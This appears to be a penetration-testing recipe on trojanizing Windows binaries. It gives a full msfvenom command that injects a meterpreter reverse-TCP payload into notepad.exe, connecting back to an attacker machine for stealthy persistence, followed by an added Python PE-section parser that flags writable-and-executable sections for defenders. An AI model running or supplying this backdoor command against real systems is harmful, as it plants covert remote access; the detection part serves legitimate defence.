Backdooring Windows binaries
By backdooring system binaries, we can ensure that we will have persistence on the target machine, and we won't trigger alarms by adding new registry entries or new binaries to the system.
How to do it...
- We will use msfvenom to backdoor the notepad.exe binary:
  - Use -a for the architecture, in this case, x86
  - --platform for the platform of the payload, Windows
  - -p for the payload to use, windows/meterpreter/reverse_tcp
  - LHOST followed by the IP address of our Kali machine
  - -x to specify a custom executable file to use as a template; in this recipe, we will use notepad.exe
  - -k to preserve the template behavior and inject the payload as a new thread
  - -f for the output format
  - -b to specify characters to avoid; in this case, null bytes "\x00"
  - and -o for the output name of the payload:
- Use:
  root@kali:~# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.216.5 -x notepad.exe -k -f exe -b "\x00" -o notepad-backdoored.exe
  Found 10 compatible encoders
  Attempting...
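From the defender's side, a trojanized copy of a system binary no longer matches the hash or Authenticode signature of the original, which is the primary check; the added example below (not part of the recipe) is a secondary heuristic that parses the PE section table with the standard library only and flags sections mapped both writable and executable, which Microsoft-built binaries normally do not carry. The function names, the section names and the header-only sample images are constructed for this example.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000  # section characteristics flags (PE/COFF spec)
IMAGE_SCN_MEM_WRITE = 0x80000000


def pe_sections(data: bytes):
    """Parse the section table of a PE image and return [(name, characteristics)]."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                      # COFF file header follows "PE\0\0"
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size             # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        off = table + 40 * i                 # each section header is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, chars))
    return sections


def rwx_sections(data: bytes):
    """Names of sections mapped writable AND executable; a hit on a copy of a
    system file is a cue to compare its hash/signature against a known-good copy."""
    both = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    return [name for name, chars in pe_sections(data) if chars & both == both]


def build_pe(sections):
    """Constructed test fixture: a header-only PE (not loadable) with the given
    section names and characteristics, so the parser can be exercised offline."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)      # e_lfanew -> offset 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x102)
    table = b"".join(n.ljust(8, b"\0") + b"\0" * 28 + struct.pack("<I", c)
                     for n, c in sections)
    return dos + b"PE\0\0" + coff + table


# Constructed samples: a typical layout, and the same layout plus one RWX section.
BASE = [(b".text", 0x60000020), (b".data", 0xC0000040), (b".rsrc", 0x40000040)]
CLEAN = build_pe(BASE)
SUSPECT = build_pe(BASE + [(b".extra", 0xE0000020)])

if __name__ == "__main__":
    for label, image in (("clean", CLEAN), ("suspect", SUSPECT)):
        print(label, rwx_sections(image))
```

Run it against a real file with `rwx_sections(open(path, "rb").read())`; an empty list is not a clean bill of health, only the absence of this one indicator.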